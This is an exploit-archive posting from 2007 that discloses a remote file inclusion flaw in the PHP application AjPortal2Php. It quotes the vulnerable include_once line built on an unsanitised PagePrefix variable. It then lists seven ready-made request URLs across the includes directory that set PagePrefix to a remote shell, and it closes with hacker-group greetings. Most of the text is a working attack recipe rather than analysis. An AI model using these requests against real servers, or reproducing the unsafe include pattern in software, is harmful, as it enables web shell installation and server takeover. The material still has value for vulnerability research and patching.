[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AjPortal2Php (PagePrefix) Remote File Inclusion Vulnerabilities
# Published : 2007-04-17
# Author : Alkomandoz Hacker
# Previous Title : Anthologia 0.5.2 (index.php ads_file) Remote File Inclusion Vulnerability
# Next Title : Joomla Component JoomlaPack 1.0.4a2 RE (CAltInstaller.php) RFI
# [ AjPortal2Php]
# Class: File Include Vulnerability
# Remote: Yes
# Site: http://www.ajlopez.com/downloads/AjPortal2Php.zip
# Author: Alkomandoz Hacker
# Contact: alkomandoz-hacker@hotmail.com
#############################################################
file ;
begin.inc.php
connection.inc.php
events.inc.php
footer.inc.php
header.inc.php
menuleft.inc.php
pages.inc.php
======================================================
Vuln Code
include_once($PagePrefix.'includes/configuration.inc.php');
=======================================================
Exploit :
[AjPortal2Php _path]/includes/begin.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/connection.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/events.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/footer.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/header.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/menuleft.inc.php?PagePrefix=Shell
[AjPortal2Php _path]/includes/pages.inc.php?PagePrefix=Shell
---- Thanx: [HaCk.eGy] [Mahmood_ali] [Dr.aSiEr H@Ck] [ AsB-MaY GrOuPs ] [CiTy Of GhOsTs]
---- GreeTz: All www.Asb-May.Net & WwW.MoHaNdKo.CoM
# www.Syue.com [2007-04-17]